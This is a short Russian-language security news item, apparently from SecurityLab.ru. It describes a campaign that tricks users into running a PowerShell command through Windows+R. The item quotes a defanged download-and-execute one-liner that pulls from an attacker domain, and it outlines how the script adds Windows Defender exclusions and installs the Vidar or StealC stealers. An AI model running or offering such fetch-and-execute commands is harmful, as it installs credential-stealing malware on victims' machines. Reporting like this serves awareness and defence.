Вредоносная цепочка запускается, когда пользователь, следуя «инструкции», нажимает Windows + R и запускает Po…
Вредоносная цепочка запускается, когда пользователь, следуя «инструкции», нажимает Windows + R и запускает PowerShell с командой вроде iwr hxxps://allaivo.me/spotify -UseBasicParsing | iex. Этот скрипт: создаёт скрытые директории в APPDATA и LOCALAPPDATA; добавляет их в исключения Windows Defender; скачивает и запускает основной бэкдор Vidar или StealC с внешнего домена. Подробнее: https://www.securitylab.ru/news/559646.php
Автор: Татьяна Николаева